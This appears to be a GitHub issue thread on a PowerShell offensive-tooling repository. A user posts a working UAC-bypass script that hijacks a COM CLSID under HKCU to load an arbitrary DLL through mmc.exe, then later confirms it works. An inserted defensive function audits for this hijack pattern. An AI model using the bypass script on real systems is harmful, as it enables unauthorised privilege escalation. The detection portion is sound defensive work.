FuzzySecurity / PowerShell-Suite

My musings with PowerShell
BSD 3-Clause "New" or "Revised" License

COM handler hijack #5

Open leosilberg opened 6 years ago

leosilberg commented 6 years ago

Hi there. I was wondering if you could give me any tips on making a PowerShell script for this UAC bypass. I've tried to copy the Metasploit module but I've got nowhere.

```powershell
function ComBypass {
    param(
        [Parameter(Mandatory = $False)]
        [String]$dllFile
    )

    $rootKey = "HKCU:\SOFTWARE\Classes\CLSID{0A29FF9E-7F9C-4437-8B11-F424491E3931}"
    $inproc_key = "$rootKey\InProcServer32"
    $shell_key = "$rootKey\ShellFolder"

    New-Item $rootKey -Force
    New-Item $inproc_key
    New-Item $shell_key

    New-ItemProperty -Path $inproc_key -Name "(Default)" -Value $dllFile
    New-ItemProperty -Path $inproc_key -Name 'ThreadingModel' -Value 'Apartment'
    New-ItemProperty -Path $inproc_key -Name 'LoadWithoutCOM' -Value ''
    New-ItemProperty -Path $shell_key -Name 'HideOnDesktop' -Value ''
    New-ItemProperty -Path $shell_key -Name 'Attributes' -PropertyType 'DWord' -Value 0xf090013d

    Start-Process -File cmd.exe -ArgumentList "/c mmc.exe CompMgmt.msc" -WindowStyle Hidden
    Start-Sleep -Seconds 10

    Remove-Item -Path $rootKey -Force -Recurse
}

ComBypass -dllFile "C:\cmd.dll"
```
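The pattern the script above relies on is a per-user CLSID registration under HKCU that shadows a machine-wide one and points InProcServer32 at a DLL in a user-writable location. The following added check (not part of PowerShell-Suite or the poster's script) enumerates HKCU COM registrations from a defender's side and flags those that shadow an HKLM CLSID or load from outside the assumed trusted system directories:

```powershell
# Added defensive audit, not part of the project: list per-user COM servers under
# HKCU\Software\Classes\CLSID that shadow a machine-wide CLSID or load a DLL from
# outside trusted system directories (the hijack pattern discussed in this thread).
function Get-SuspiciousHkcuComServer {
    [CmdletBinding()]
    param(
        # Assumed trusted locations for in-process COM servers; adjust per environment.
        [string[]]$TrustedRoots = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64",
                                     $env:ProgramFiles, ${env:ProgramFiles(x86)})
    )

    $userClsidRoot = 'HKCU:\SOFTWARE\Classes\CLSID'
    if (-not (Test-Path $userClsidRoot)) { return }

    foreach ($clsidKey in Get-ChildItem -Path $userClsidRoot -ErrorAction SilentlyContinue) {
        $inproc = Join-Path $clsidKey.PSPath 'InProcServer32'
        if (-not (Test-Path $inproc)) { continue }

        # The unnamed registry value is exposed by PowerShell as '(default)'.
        $server = (Get-ItemProperty -Path $inproc -ErrorAction SilentlyContinue).'(default)'
        if ([string]::IsNullOrWhiteSpace($server)) { continue }

        # Expand %SystemRoot%-style references and strip quotes before checking the path.
        $expanded = [Environment]::ExpandEnvironmentVariables($server.Trim('"'))
        $inTrusted = $false
        foreach ($root in $TrustedRoots) {
            if ($root -and $expanded.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) {
                $inTrusted = $true
                break
            }
        }

        # An HKCU CLSID that also exists under HKLM takes precedence for this user,
        # so a matching machine-wide key is the strongest hijack indicator.
        $shadowsHklm = Test-Path ("HKLM:\SOFTWARE\Classes\CLSID\" + $clsidKey.PSChildName)

        if (-not $inTrusted -or $shadowsHklm) {
            [pscustomobject]@{
                CLSID          = $clsidKey.PSChildName
                InProcServer32 = $expanded
                ShadowsHKLM    = $shadowsHklm
                TrustedPath    = $inTrusted
                DllExists      = Test-Path -LiteralPath $expanded
            }
        }
    }
}

Get-SuspiciousHkcuComServer | Format-Table -AutoSize
```

Per-user installs (software living under AppData) legitimately register HKCU CLSIDs, so entries with TrustedPath false but ShadowsHKLM false are usually benign and should be baselined rather than treated as findings. A ShadowsHKLM true entry whose DLL no longer exists (DllExists false) matches the create-use-delete sequence in the script above and is worth correlating with registry-write telemetry for that key.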

leosilberg commented 6 years ago

Never mind. I found my mistake, wrong dll architecture used. The script works fine.